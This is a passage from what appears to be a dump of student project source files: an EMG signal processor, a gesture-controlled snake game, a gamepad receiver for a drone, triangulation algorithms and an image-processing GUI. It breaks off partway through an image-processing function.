if self.recording_type == "raw":
self.emg_writer.writerow(CSV_HEADER_EMG)
else:
self.emg_writer.writerow(CSV_HEADER_CA[:self.stream.ca_components + 1])
elif self.emg_file is not None:
self.emg_file.close()
self.emg_file = None
self.emg_writer = None
self.recording = recording
# Recorded Myo data playback interface
class Playback():
def __init__(self, stream, filename):
self.stream = stream
self.valid = False
self.type = ""
try:
self.emg_file = open(filename, "r", newline="")
self.emg_reader = csv.reader(self.emg_file, csv.unix_dialect, quoting=csv.QUOTE_MINIMAL)
self.read_header()
except FileNotFoundError:
self.emg_file = None
def close(self):
if self.emg_file:
self.emg_file.close()
def read_header(self):
try:
header = next(self.emg_reader)
if header == CSV_HEADER_EMG:
self.valid = True
self.type = "raw"
if header[:2] == CSV_HEADER_CA[:2]:
self.valid = True
self.type = "ca"
except StopIteration:
pass
def is_valid(self):
return self.valid
# Plays a frame from the recording and indicating end of recording on subsequent calls
def play_frame(self):
if not self.stream.paused:
try:
data = next(self.emg_reader)
if self.type == "raw":
timestamp, emg = data[0], list(map(int, data[1:]))
rms_data, ca_data, gesture = self.stream.plot(emg)
else:
timestamp, emg = data[0], list(map(float, data[1:]))
rms_data, ca_data, gesture = self.stream.plot(emg, ca=True)
if VERBOSE:
print(f"[playback] emg: {timestamp}, {emg}")
return timestamp, rms_data, ca_data, gesture
except StopIteration:
self.stream.end()
return 0, [], [], ""
def main():
# Parse arguments
parser = argparse.ArgumentParser(description="Electromyography Processor")
group1 = parser.add_mutually_exclusive_group()
group1.add_argument("-r", "--recording", default=None, metavar="REC", help="playback recorded Myo data stream")
group1.add_argument("-s", "--sleep", default=False, action="store_true", help="put Myo into deep sleep (turn off)")
parser.add_argument("--rms", default=False, action="store_true", help="process stream using RMS smoothing")
group2 = parser.add_mutually_exclusive_group()
group2.add_argument("--pca", nargs="+", metavar="REC", help="process stream using RAW training set or PCA model")
group2.add_argument("--ica", nargs="+", metavar="REC", help="process stream using RAW training set or ICA model")
parser.add_argument("-c", "--components", default=3, type=int, help="PCA/ICA components to use")
group3 = parser.add_mutually_exclusive_group()
group3.add_argument("--svm", nargs="+", metavar="REC", help="classify using PCA/ICA training set or SVM model")
group4 = parser.add_mutually_exclusive_group()
group4.add_argument("--tty", default=None, help="Myo dongle device (autodetected if omitted)")
group4.add_argument("--native", default=False, action="store_true", help="use a native Bluetooth stack")
parser.add_argument("--mac", default=None, help="Myo MAC address (arbitrarily detected if omitted)")
parser.add_argument("-v", "--verbose", default=False, action="store_true", help="verbose output")
args = parser.parse_args()
if args.svm and not args.pca and not args.ica:
parser.error("the following arguments are required for 'svm': 'pca' or 'ica'")
# Model was given instead of trainining set
if args.pca is not None and len(args.pca) == 1 and not args.pca[0].endswith(".csv"):
args.pca = args.pca[0]
if args.ica is not None and len(args.ica) == 1 and not args.ica[0].endswith(".csv"):
args.ica = args.ica[0]
if args.svm is not None and len(args.svm) == 1 and not args.svm[0].endswith(".csv"):
args.svm = args.svm[0]
if args.verbose:
global VERBOSE
VERBOSE = args.verbose
live_myo = args.recording is None
# Setup common stream interface for Myo or Playback
stream = Stream(do_rms=args.rms, pca_train_set=args.pca, ica_train_set=args.ica, svm_train_set=args.svm,
ca_components=args.components)
# Setup Myo or Playback
if live_myo:
try:
print("Connecting to Myo...")
myo = Myo(stream, args.tty, args.native, args.mac)
print("Connected to Myo!")
except (ValueError, KeyboardInterrupt) as e:
print(f"Error! Unable to connect!\n{e}")
return 1
else:
playback = Playback(stream, args.recording)
if not playback.is_valid():
print("Error! Invalid CSV file!")
return 2
# Run main logic
if args.sleep:
if live_myo:
myo.sleep()
else:
pygame.init()
stream.create_plot(live=live_myo)
# Run until terminated by user or recording ended
try:
starttime = time.time()
while True:
if live_myo:
try:
myo.run()
except serial.serialutil.SerialException:
print("Error! Myo exception! Attempting reboot...")
myo.disconnect()
myo = Myo(stream, args.tty, args.native, args.mac)
else:
playback.play_frame()
# Delay by (1 second / FREQUENCY Hz) including execution time
delay = 1 / FREQUENCY
diff = min(time.time() - starttime, 1 / FREQUENCY)
time.sleep(delay - diff)
starttime = time.time()
# Handle Pygame events
for ev in pygame.event.get():
if ev.type == pygame.QUIT:
raise KeyboardInterrupt()
elif ev.type == pygame.KEYDOWN:
if ev.key == pygame.K_q:
raise KeyboardInterrupt()
elif ev.key == pygame.K_p:
stream.pause(toggle=True)
elif ev.key == pygame.K_r:
if live_myo:
myo.record(toggle=True)
except KeyboardInterrupt:
pass
if live_myo:
myo.close()
else:
playback.close()
return 0
# Conditional imports
if __name__ == "__main__" or os.environ.get("EMGPROC_LOAD_GAME", False):
import pygame
if __name__ == "__main__" or os.environ.get("EMGPROC_LOAD_MYO", False):
from myo_raw import MyoRaw, DataCategory, EMGMode
if __name__ == "__main__":
sys.exit(main())
```
#### File: EMGProc/game/game.py
```python
import random
import pygame
from .models.snake import Snake
from .models.cube import Cube
from .models.menu import MenuGame
pygame.init()
class MainGame:
def __init__(self, stream=None):
self.width = 500
self.height = 500
self.rows = 20
self.window = pygame.display.set_mode((self.width, self.height))
self.caption = "SnaPy Myo"
self.color = (255, 0, 0)
self.menu_font = pygame.font.Font("game/fonts/menu_font.ttf", 24)
self.name_font = pygame.font.Font("game/fonts/name_font.ttf", 30)
self.cre_by = pygame.font.Font("game/fonts/menu_font.ttf", 14)
self.score_font = pygame.font.Font("game/fonts/menu_font.ttf", 12)
print("Created by Wultes - https://github.com/wultes/")
print("Modified by Jonpas for Myo armband input")
self.stream = stream
self.menu()
def setup(self):
self.player = Snake(self.color, (10, 10))
self.snack = Cube(self.random_snack(), color=(0, 255, 0))
self.score = 0
self.paused = False
self.last_gesture = "idle"
def draw_score(self):
textobj = self.score_font.render(f"Score: {self.score}", 1, (0, 0, 0))
textreact = textobj.get_rect()
textreact.topleft = (10, 10)
self.window.blit(textobj, textreact)
def draw_myo_frequency(self):
freq = self.stream.frequency
textobj = self.score_font.render(f"{freq} Hz", 1,
pygame.Color("darkgreen") if freq > 180 else pygame.Color("red"))
textreact = textobj.get_rect()
textreact.topright = (self.width - 10, 10)
self.window.blit(textobj, textreact)
def draw_myo_gesture(self):
gesture = self.last_gesture
textobj = self.score_font.render(f"{gesture}", 1,
pygame.Color("darkgreen") if gesture != "idle" else pygame.Color("grey"))
textreact = textobj.get_rect()
textreact.topright = (self.width - 10, 30)
self.window.blit(textobj, textreact)
def draw(self):
self.window.fill((255, 255, 255))
self.player.draw(self.window)
self.snack.draw(self.window)
self.draw_score()
self.draw_myo_frequency()
self.draw_myo_gesture()
pygame.display.update()
def random_snack(self):
positions = self.player.body
while True:
x = random.randrange(self.rows)
y = random.randrange(self.rows)
if len(list(filter(lambda z: z.pos == (x, y), positions))) <= 0:
break
return(x, y)
def menu(self):
try:
pygame.display.set_caption(self.caption)
menu = MenuGame()
while True:
# Delay required to not take up all CPU time away from Myo thread
pygame.time.delay(100)
for event in pygame.event.get():
if event.type == pygame.QUIT:
raise KeyboardInterrupt()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_q:
raise KeyboardInterrupt()
elif event.key == pygame.K_SPACE:
self.setup()
self.run()
menu.draw(self.window)
except KeyboardInterrupt:
pass
return 0
def run(self):
try:
pygame.display.set_caption(self.caption)
clock = pygame.time.Clock()
while True:
pygame.time.delay(50)
clock.tick(5)
# Keyboard input
move = None
for ev in pygame.event.get():
if ev.type == pygame.QUIT:
raise KeyboardInterrupt()
elif ev.type == pygame.KEYDOWN:
if ev.key == pygame.K_q:
raise KeyboardInterrupt()
elif ev.key == pygame.K_p:
self.paused = not self.paused
elif not self.paused:
if ev.key == pygame.K_LEFT or ev.key == pygame.K_a:
move = "left"
elif ev.key == pygame.K_RIGHT or ev.key == pygame.K_d:
move = "right"
if self.paused:
continue
# Gesture input
gesture = self.stream.gesture
if gesture != self.last_gesture:
self.last_gesture = gesture
if gesture == "extension":
move = "right"
elif gesture == "flexion":
move = "left"
self.player.move(move)
if self.player.body[0].pos == self.snack.pos:
self.score += 1
self.player.add_cube()
self.snack = Cube(self.random_snack(), color=(0, 255, 0))
for x in range(len(self.player.body)):
if self.player.body[x].pos in list(map(lambda z: z.pos, self.player.body[x + 1:])):
print(f"Your score: {len(self.player.body)}")
self.score = 0
self.player.reset((10, 10))
break
self.draw()
except KeyboardInterrupt:
pass
```
#### File: game/models/cube.py
```python
import pygame
class Cube:
def __init__(self, start, dirnx=1, dirny=0, color=(255, 0, 0)):
self.pos = start
self.dirnx = 1
self.dirny = dirny
self.color = color
self.width = 500
self.rows = 20
def move(self, dirnx, dirny):
self.dirnx = dirnx
self.dirny = dirny
self.pos = (self.pos[0] + self.dirnx, self.pos[1] + self.dirny)
def draw(self, window, eyes=False):
dis = self.width // self.rows
i = self.pos[0]
j = self.pos[1]
pygame.draw.rect(window, self.color, (i * dis + 1, j * dis + 1, dis - 2, dis - 2))
if eyes:
centre = dis // 2
radius = 3
circleMiddle = (i * dis + centre - radius, j * dis + 8)
circleMiddle2 = (i * dis + dis - radius * 2, j * dis + 8)
pygame.draw.circle(window, (0, 0, 0), circleMiddle, radius)
pygame.draw.circle(window, (0, 0, 0), circleMiddle2, radius)
``` |
{
"source": "jonpas/FERI-DroneTasks",
"score": 3
} |
#### File: FERI-DroneTasks/SIS_Player/Receiver.py
```python
from inputs import get_gamepad
from threading import Thread, Event
from time import sleep
from PpmSignal import PpmSignal
class Receiver:
def __init__(self, parent):
self.recording_signal = Event()
self.send_delay = 0.0225
self.parent = parent
self.signal = PpmSignal()
# TEST
# for i in range(10):
# self.signal.axis_to_signal(1, 2, 1.5, 1, 2, 1, 1.5, 1.5)
self.create_threads()
# Axis values
self.roll = 1.5
self.pitch = 1.5
self.yaw = 1.5
self.throttle = 1.5
# Starts recording inputs async
def get_inputs(self):
self.recording_signal.set()
self.create_threads()
self.recording_Thread.start()
self.sending_Thread.start()
# Function that will run async and will record controller state
def recording_function(self):
while self.recording_signal.is_set():
events = get_gamepad()
for event in events:
if event.code == "ABS_X":
self.roll = (event.state / (32767 * 2)) + 1.5
elif event.code == "ABS_Y":
self.pitch = (event.state / (32767 * 2)) + 1.5
elif event.code == "ABS_RX":
self.yaw = (event.state / (32767 * 2)) + 1.5
elif event.code == "ABS_RY":
self.throttle = (event.state / (32767 * 2)) + 1.5
# Function that will send controller state in correct intervals
def sending_function(self):
while self.recording_signal.is_set():
self.signal.axis_to_signal(self.roll, self.pitch, self.yaw, self.throttle)
sleep(self.send_delay)
def stop_inputs(self):
self.recording_signal.clear()
def recording(self):
return self.recording_signal.is_set()
def create_threads(self):
self.recording_Thread = Thread(target=self.recording_function, args=[])
self.recording_Thread.daemon = True
self.sending_Thread = Thread(target=self.sending_function, args=[])
self.sending_Thread.daemon = True
def get_ppm_data(self):
return self.signal.get_data()
def reset(self):
# Stop if running
if self.recording():
self.stop_inputs()
# Set inputs to default values
self.roll = 1.5
self.pitch = 1.5
self.yaw = 1.5
self.throttle = 1.5
# Reset signal
self.signal = PpmSignal()
``` |
{
"source": "jonpas/FERI-GeomCalc",
"score": 3
} |
#### File: jonpas/FERI-GeomCalc/common.py
```python
import numpy as np
# Compares 2 numbers if equal, designed for floats to overcome precision errors
def almost_equal(a, b):
return np.abs(a - b) < 0.000001
# Faster implementation of np.cross() for 2 vectors (3 points) returning magnitude directly
def area_triangle(a, b, c):
return area_rectangle(a, b, c, b) # d = b
# Faster implementation of np.cross() for 2 vectors (4 points) returning magnitude directly
def area_rectangle(a, b, c, d):
return (a[0] - b[0]) * (c[1] - d[1]) - (a[1] - b[1]) * (c[0] - d[0])
```
#### File: FERI-GeomCalc/modes/plane_triangulation.py
```python
import numpy as np
from modes import points_lines as pl
from modes import convex_hulls as ch
class PlaneTriangulation():
def __init__(self, parent):
self.parent = parent
self.algorithm = 0 # 0 - Minimum-Weight Triangulation, 1 - Hamiltonian Path
self.points = np.array([])
def set_algorithm(self, algorithm):
self.algorithm = algorithm
def set_points(self, points):
self.points = np.array(points, dtype=float)
def calculate(self):
if self.algorithm == 0:
return mwt(self.points), (np.array([]), np.array([]))
elif self.algorithm == 1:
return np.array([]), hamiltonian_path(self.points, main=self.parent)
def mwt(points):
if len(points) < 2:
return np.array([])
# Generate convex hull (for algorithm end check)
ch_points = len(ch.quickhull(points)) - 1 # -1 from final connection
# Generate all possible lines
lines = []
distances = []
for i, p1 in enumerate(points):
for p2 in points[i + 1:]:
lines.append([p1, p2])
distances.append(pl.euclidean_dist(p1, p2))
# Sort lines by distance (shortest to longest)
lines = np.array(lines)
distances = np.array(distances)
lines = lines[distances.argsort()]
# Shortest line is definitely part of triangulation
pt_lines = [lines[0]]
lines = lines[1:]
# Accept lines that don't intersect already accepted lines, reject others
# Repeat until enough lines are accepted (3 * points - 3 - convex hull points)
while len(pt_lines) < 3 * len(points) - 3 - ch_points:
line = lines[0]
intersection = False
for pt_line in pt_lines:
pi, itype = pl.intersection(line[0], line[1], pt_line[0], pt_line[1])
if itype == "intersection":
intersection = True
break
if not intersection:
pt_lines.append(line)
lines = lines[1:]
return np.array(pt_lines)
def hamiltonian_path(points, main=None):
# Generate convex hulls and spiral list
ch_points = []
s_points = []
while len(points) > 0:
# Generate convex hull (without last connecting point)
ch_p = ch.quickhull(points)[:-1]
# Find max Y and roll hull around to have max Y as first element
ch_max_i = np.lexsort((ch_p[:, 0], ch_p[:, 1]))[-1] # Max Y point's index
ch_p = np.roll(ch_p, -ch_max_i, axis=0)
# Assure first point in inner hull forms convex angle
if len(s_points) > 0 and len(ch_p) > 1:
# Roll until convex angle (one roll might not be enough)
angle = -1
while angle < 0:
a = s_points[-1] - ch_p[0] # Vector from last point of outer hull to first point in inner hull
b = ch_p[0] - ch_p[1] # Vector from first point to second point in inner hull
angle = np.arctan2(a[0] * b[1] - a[1] * b[0], a[0] * b[0] + a[1] * b[1]) # Angle between above vectors
# Roll by one so wanted point becomes first
if angle < 0:
ch_p = np.roll(ch_p, -1, axis=0)
# if main is not None:
# main.plot_point(ch_p[-1], text="O") # Debug
# main.plot_point(ch_p[0], text="R") # Debug
# Assure spiral doesn't intersect itself
if len(ch_points) > 0:
ch_last = ch_points[-1]
first, last, inner = ch_last[0], ch_last[-1], ch_p[0]
for i, p in enumerate(ch_p[:-1]):
pi, itype = pl.intersection(last, inner, p, ch_p[i + 1])
if itype == "intersection":
# Insert point high enough between first and last point of outer hull
offset_factor = (inner[1] - last[1]) / (first[1] - last[1])
x_offset = (last[0] - first[0]) * offset_factor
new_p = [last[0] - x_offset, inner[1]]
# Insert to outer hull (not part of inner hull!) and spiral
ch_points[-1] = np.vstack((ch_last, [new_p]))
s_points.append(np.array(new_p))
# if main is not None:
# main.plot_connection(first, last, color="blue") # Debug
# main.plot_point(last, color="red", text="I") # Debug
# main.plot_point(new_p, color="red", text="O") # Debug
break
# Add to forming spiral and hulls list
s_points.extend(ch_p)
ch_points.append(ch_p)
# Remove convex hull points from left-over points
points = np.array([p for p in points if p not in ch_p])
# Exit if not enough convex hulls for triangulation
if len(ch_points) < 2:
return np.array(s_points), np.array([])
# Generate generalized triangle strip
# Indexes of last point in first hull, first points in second and first hulls
a, b, c = len(ch_points[0]) - 1, len(ch_points[0]), 0
pt_points = [s_points[a], s_points[b], s_points[c]]
# Walk path until last 2 indexes are one apart
while b - 1 != c:
# Move to next triangle
a, b = b, c
c = a + 1
# Degenerate on final point
if c >= len(s_points):
c = a # Swap to valid index (degenerate)
pt_points.append(s_points[c])
continue
# Check if new line intersects spiral list or already created lines
line = [pt_points[-1], s_points[c]]
intersection = False
for i, p in enumerate(s_points[:-1]):
pi, itype = pl.intersection(line[0], line[1], p, s_points[i + 1])
if itype == "intersection":
intersection = True
break
if not intersection:
for i, p in enumerate(pt_points[:-1]):
pi, itype = pl.intersection(line[0], line[1], p, pt_points[i + 1])
if itype == "intersection":
intersection = True
break
# Degenerate on intersection
if intersection:
c = a # Swap to valid index (degenerate)
pt_points.append(s_points[c])
return np.array(s_points), np.array(pt_points)
``` |
{
"source": "jonpas/FERI-SigProc",
"score": 2
} |
#### File: jonpas/FERI-SigProc/imgproc.py
```python
import sys
import os
import numpy as np
import cv2
from scipy import signal
from scipy.ndimage import morphology
from skimage.exposure import rescale_intensity
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar
from matplotlib.figure import Figure
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import *
from PyQt5.QtGui import QIntValidator
class MainWindow(QWidget):
def __init__(self):
super().__init__()
self.ax = None
self.orig_img = None
self.img = None
self.initUI()
def initUI(self):
spacer = QSpacerItem(50, 0, QSizePolicy.Minimum)
spacer_small = QSpacerItem(10, 0, QSizePolicy.Minimum)
# File selector
lbl_file = QLabel("File:")
self.txt_file = QLineEdit()
self.txt_file.setPlaceholderText("Select file ...")
btn_file = QPushButton("Select")
btn_file.clicked.connect(self.show_open_dialog)
# Save
self.btn_save = QPushButton("Save")
self.btn_save.clicked.connect(self.show_save_dialog)
# Reset
self.btn_reset = QPushButton("Reset")
self.btn_reset.setToolTip("Show originally loaded image (reset all modifications)")
self.btn_reset.clicked.connect(lambda: self.plot_image(self.orig_img))
# Histogram
self.btn_hist = QPushButton("Histogram")
self.btn_hist.setToolTip("Draw histogram of current image")
self.btn_hist.clicked.connect(self.histogram)
# Graph space
self.figure = Figure()
FigureCanvas(self.figure)
self.figure.canvas.setMinimumHeight(300)
# Conversion to Grayscale
self.cb_gray = QComboBox()
self.cb_gray.setToolTip("Grayscale conversion method")
self.cb_gray.addItems(["Average", "Red", "Green", "Blue"])
self.btn_gray = QPushButton("Grayscale")
self.btn_gray.setToolTip("Convert loaded image to grayscale image")
self.btn_gray.clicked.connect(lambda: self.grayscale(self.cb_gray.currentIndex() - 1))
# Segmentation / Binarization
self.segment_thresh = QLineEdit()
self.segment_thresh.setText("100")
self.segment_thresh.setToolTip("Segmentation threshold")
self.segment_thresh.setMaximumWidth(30)
self.segment_thresh.setValidator(QIntValidator(0, 255))
self.btn_segment = QPushButton("Binarize")
self.btn_segment.setToolTip("Convert loaded image to binary image using segmentation")
self.btn_segment.clicked.connect(lambda: self.binarize(int(self.segment_thresh.text())))
# Graph toolbar
self.plotnav = NavigationToolbar(self.figure.canvas, self.figure.canvas)
self.plotnav.setStyleSheet("QToolBar { border: 0px }")
self.plotnav.setOrientation(Qt.Vertical)
# Image processing implementation
self.cb_imgproc_impl = QComboBox()
self.cb_imgproc_impl.setToolTip("Processing implementation")
self.cb_imgproc_impl.addItems(["OpenCV", "SciPy", "Manual"])
# Smooth / Blur
self.smooth_intensity = QLineEdit()
self.smooth_intensity.setText("5")
self.smooth_intensity.setToolTip("Smooth intensity (must at least 3 and odd)")
self.smooth_intensity.setMaximumWidth(30)
self.smooth_intensity.setValidator(QIntValidator(0, 255))
self.btn_smooth = QPushButton("Smooth")
self.btn_smooth.setToolTip("Smooth (blur) current image")
self.btn_smooth.clicked.connect(lambda: self.smooth(int(self.smooth_intensity.text())))
# Sharpen
self.sharpen_intensity = QLineEdit()
self.sharpen_intensity.setText("5")
self.sharpen_intensity.setToolTip("Sharpen intensity (must be at least 5)")
self.sharpen_intensity.setMaximumWidth(30)
self.sharpen_intensity.setValidator(QIntValidator(0, 255))
self.btn_sharpen = QPushButton("Sharpen")
self.btn_sharpen.setToolTip("Sharpen current image")
self.btn_sharpen.clicked.connect(lambda: self.sharpen(int(self.sharpen_intensity.text())))
# Edge detection
self.edge_intensity = QLineEdit()
self.edge_intensity.setText("4")
self.edge_intensity.setToolTip("Edge detection intensity (must be at least 4)")
self.edge_intensity.setMaximumWidth(30)
self.edge_intensity.setValidator(QIntValidator(0, 255))
self.btn_edge = QPushButton("Detect Edges")
self.btn_edge.setToolTip("Detect edges on current image")
self.btn_edge.clicked.connect(lambda: self.detect_edges(int(self.edge_intensity.text())))
# Dilate
self.dilate_intensity = QLineEdit()
self.dilate_intensity.setText("5")
self.dilate_intensity.setToolTip("Dilation intensity (must be at least 2)")
self.dilate_intensity.setMaximumWidth(30)
self.dilate_intensity.setValidator(QIntValidator(0, 255))
self.btn_dilate = QPushButton("Dilate")
self.btn_dilate.setToolTip("Dilate current image")
self.btn_dilate.clicked.connect(lambda: self.dilate(int(self.dilate_intensity.text())))
# Erode
self.erode_intensity = QLineEdit()
self.erode_intensity.setText("5")
self.erode_intensity.setToolTip("Erosion intensity (must be at least 2)")
self.erode_intensity.setMaximumWidth(30)
self.erode_intensity.setValidator(QIntValidator(0, 255))
self.btn_erode = QPushButton("Erode")
self.btn_erode.setToolTip("Erode current image")
self.btn_erode.clicked.connect(lambda: self.erode(int(self.erode_intensity.text())))
# Layout
hbox_top = QHBoxLayout()
hbox_top.addWidget(lbl_file)
hbox_top.addWidget(self.txt_file)
hbox_top.addWidget(btn_file)
hbox_top.addWidget(self.btn_save)
hbox_top.addWidget(self.btn_reset)
hbox_top.addStretch()
hbox_top.addSpacerItem(spacer)
hbox_top.addWidget(self.btn_hist)
hbox_top.addStretch()
hbox_top.addSpacerItem(spacer)
hbox_top.addWidget(self.cb_gray)
hbox_top.addWidget(self.btn_gray)
hbox_top.addSpacerItem(spacer_small)
hbox_top.addWidget(self.segment_thresh)
hbox_top.addWidget(self.btn_segment)
hbox_bot = QHBoxLayout()
hbox_bot.addWidget(self.cb_imgproc_impl)
hbox_bot.addStretch()
hbox_bot.addSpacerItem(spacer)
hbox_bot.addWidget(self.smooth_intensity)
hbox_bot.addWidget(self.btn_smooth)
hbox_bot.addWidget(self.sharpen_intensity)
hbox_bot.addWidget(self.btn_sharpen)
hbox_bot.addWidget(self.edge_intensity)
hbox_bot.addWidget(self.btn_edge)
hbox_bot.addStretch()
hbox_bot.addSpacerItem(spacer)
hbox_bot.addWidget(self.dilate_intensity)
hbox_bot.addWidget(self.btn_dilate)
hbox_bot.addWidget(self.erode_intensity)
hbox_bot.addWidget(self.btn_erode)
vbox = QVBoxLayout()
vbox.addLayout(hbox_top)
vbox.addWidget(self.figure.canvas)
vbox.addLayout(hbox_bot)
self.update_ui()
# Window
self.setLayout(vbox)
self.setGeometry(300, 300, 1000, 500)
self.setWindowTitle("Signal Processor - Image")
self.show()
# Overriden resize event
def resizeEvent(self, resizeEvent):
self.plotnav.move(self.width() - 55, 0)
def update_ui(self):
block_general = not self.is_image_loaded()
self.btn_save.setDisabled(block_general)
self.btn_reset.setDisabled(block_general)
self.btn_hist.setDisabled(block_general)
self.btn_gray.setDisabled(block_general)
self.btn_segment.setDisabled(block_general)
self.btn_smooth.setDisabled(block_general)
self.btn_sharpen.setDisabled(block_general)
self.btn_dilate.setDisabled(block_general)
self.btn_erode.setDisabled(block_general)
self.btn_edge.setDisabled(block_general)
def show_open_dialog(self):
fname, ext = QFileDialog.getOpenFileName(self, "Open file", filter="Image (*.png *.jpg *.bmp)")
if fname and self.load_image(fname):
self.txt_file.setText(fname)
def show_save_dialog(self):
fname, ext = QFileDialog.getSaveFileName(self, "Save file", filter="Image (*.png *.jpg *.bmp)")
if fname and self.is_image_loaded():
# Save as PNG if not set
if '.' not in fname:
fname += ".png"
cv2.imwrite(fname, cv2.cvtColor(self.img, cv2.COLOR_RGB2BGR))
self.txt_file.setText(fname)
def load_image(self, file):
if not os.path.isfile(file):
return False
# Read image and convert from BGR (OpenCV default) to RGB
self.orig_img = cv2.imread(file)
self.orig_img = cv2.cvtColor(self.orig_img, cv2.COLOR_BGR2RGB)
self.img = self.orig_img
self.plot_image(self.orig_img)
self.update_ui()
return True
def is_image_loaded(self):
return self.img is not None
def reset_plot(self):
self.figure.clear()
self.ax = self.figure.add_subplot(1, 1, 1)
def plot_image(self, img):
self.reset_plot()
self.ax.axis("off")
self.ax.imshow(img, cmap='gray' if len(img.shape) < 3 else None)
self.figure.canvas.draw()
self.img = img
# Draw histogram of current image
def histogram(self):
self.reset_plot()
self.ax.margins(0)
# Plot each channel on RGB image or only first channel on grayscale image
colors = ('r', 'g', 'b') if len(self.img.shape) > 2 else ('b',)
for i, color in enumerate(colors):
hist = cv2.calcHist([self.img], [i], None, [256], [0, 256])
self.ax.plot(hist, color=color)
self.figure.canvas.draw()
# Convert current image to grayscale
def grayscale(self, type=-1): # -1 - Average, 0 - Red, 1 - Green, 2 - Blue
# Do nothing if already grayscale
if len(self.img.shape) < 3:
return self.img
if type < 0:
# Convert to grayscale by averaging all channels
img_gray = cv2.cvtColor(self.img, cv2.COLOR_RGB2GRAY)
else:
# Convert to grayscale by taking one channel
img_gray = self.img[:, :, type]
self.plot_image(img_gray)
# Binarize current image
def binarize(self, threshold=0):
# Make sure we are operating on grayscale image (applied to original image)
self.grayscale()
_, img_bin = cv2.threshold(self.img, threshold, 255, cv2.THRESH_BINARY_INV)
self.plot_image(img_bin)
# Get convolution implementation from combo box (lower-case text)
def get_imgproc_impl(self):
return self.cb_imgproc_impl.currentText().lower()
# Smooth (blur) current image
def smooth(self, intensity=5):
if intensity < 3 or intensity % 2 == 0:
print("Error! Smooth intensity should be at least 3 and an odd integer!")
kernel = np.ones((intensity, intensity)) / intensity**2
img_smooth = self.convolve2d(kernel)
self.plot_image(img_smooth)
# Sharpen current image
def sharpen(self, intensity=5):
if intensity < 5:
print("Warning! Sharpen intensity should be at least 5! Defaulting to 5!")
kernel = np.array((
[0, -1, 0],
[-1, max(intensity, 5), -1],
[0, -1, 0]))
img_sharp = self.convolve2d(kernel)
self.plot_image(img_sharp)
# Detect edges on current image
def detect_edges(self, intensity=5):
if intensity < 4:
print("Warning! Edge detection intensity should be at least 4! Defaulting to 4!")
kernel = np.array((
[0, 1, 0],
[1, -max(intensity, 4), 1],
[0, 1, 0]))
img_edges = self.convolve2d(kernel)
self.plot_image(img_edges)
# Dilate current image
def dilate(self, intensity=5):
if intensity < 2:
print("Warning! Dilation intensity should be at least 2! Defaulting to 2!")
intensity = 2
kernel = np.full((intensity, intensity), 255)
imgproc = self.get_imgproc_impl()
if imgproc == "opencv":
# OpenCV dilate
img_dilate = cv2.dilate(self.img, kernel)
elif imgproc == "scipy":
# SciPy grey_dilation
img_dilate = self.morph2d_scipy(self.img, kernel, morph_func=morphology.grey_dilation)
elif imgproc == "manual":
# Manual morphology
img_dilate = self.convolve2d_manual(
self.img, kernel,
func=lambda roi, kernel: np.max(roi[kernel.astype(np.bool)]))
else:
print("Error! Unknown image processing implementation!")
img_dilate = self.img
self.plot_image(img_dilate)
# Erode current image
def erode(self, intensity=5):
if intensity < 2:
print("Warning! Erosion intensity should be at least 2! Defaulting to 2!")
intensity = 2
kernel = np.full((intensity, intensity), 255, dtype=np.uint8)
imgproc = self.get_imgproc_impl()
if imgproc == "opencv":
img_erode = cv2.erode(self.img, kernel)
elif imgproc == "scipy":
img_erode = self.morph2d_scipy(self.img, kernel, morph_func=morphology.grey_erosion)
elif imgproc == "manual":
img_erode = self.convolve2d_manual(
self.img, kernel,
func=lambda roi, kernel: np.min(roi[kernel.astype(np.bool)]))
else:
print("Error! Unknown image processing implementation!")
img_erode = self.img
self.plot_image(img_erode)
# Convolve given image
def convolve2d(self, kernel):
imgproc = self.get_imgproc_impl()
if imgproc == "opencv":
return cv2.filter2D(self.img, -1, kernel)
elif imgproc == "scipy":
return self.convolve2d_scipy(self.img, kernel)
elif imgproc == "manual":
return self.convolve2d_manual(
self.img, kernel,
func=lambda roi, kernel: (roi * kernel).sum())
print("Error! Unknown image processing implementation!")
return self.img
# Convolve given image with SciPy
def convolve2d_scipy(self, img, kernel):
if len(img.shape) < 3:
# Grayscale
return signal.convolve2d(img, kernel, mode="same", boundary="symm")
else:
# Color - convolve each channel
img_conv = []
for ch in range(img.shape[2]):
img_conv_ch = signal.convolve2d(img[:, :, ch], kernel, mode="same", boundary="symm")
img_conv.append(img_conv_ch)
# Stack channels, clip them to [0, 255] and represent as original image (prevent invalid range)
return np.clip(np.stack(img_conv, axis=2), 0, 255).astype(img.dtype)
# Convolve given image with manual implementation and given pixel functor
def convolve2d_manual(self, img, kernel, func=None):
if func is None:
print("Error! Invalid convolution functor!")
return img
# Get spatial dimensions of the image and kernel
(img_h, img_w) = img.shape[:2]
(kern_h, kern_w) = kernel.shape[:2]
# Pad border
pad = int((kern_w - 1) / 2)
img = cv2.copyMakeBorder(img, pad, pad, pad, pad, cv2.BORDER_REPLICATE)
if len(img.shape) < 3:
# Grayscale
return self.convolve2d_manual_channel(img, kernel, (img_h, img_w), pad, func=func)
else:
# Color - convolve each channel
img_conv = []
for ch in range(img.shape[2]):
img_conv_ch = self.convolve2d_manual_channel(img[:, :, ch], kernel, (img_h, img_w), pad, func=func)
img_conv.append(img_conv_ch)
# Stack channels, clip them to [0, 255] and represent as original image (prevent invalid range)
return np.clip(np.stack(img_conv, axis=2), 0, 255).astype(img.dtype)
# Convolve one channel of given image with manual implementation
def convolve2d_manual_channel(self, img, kernel, img_size, pad, func):
(img_h, img_w) = img_size
# Slide the kernel over the image from left to right and top to bottom
img_conv = np.zeros((img_h, img_w))
for y in np.arange(pad, img_h + pad):
for x in np.arange(pad, img_w + pad):
# Extract region of interest (ROI) of the image by extracting the center region
roi = img[y - pad:y + pad + 1, x - pad:x + pad + 1]
# Perform convolution (element-wise multiplication between ROI and kernel and sum of matrix)
k = func(roi, kernel)
# Store convolved value in the current coordinate
img_conv[y - pad, x - pad] = k
# Rescale convolved image to be in range [0, 255]
return rescale_intensity(img_conv, in_range=(0, 255)) * 255
# Morph current image with SciPy
def morph2d_scipy(self, img, kernel, morph_func=None):
if morph_func is None:
print("Error! Invalid morphology functor!")
return img
# SciPy does not like non-zero kernels
kernel = np.zeros(kernel.shape)
if len(img.shape) < 3:
# Grayscale
return morph_func(img, structure=kernel)
else:
# Color - erode each channel
img_morph = []
for ch in range(img.shape[2]):
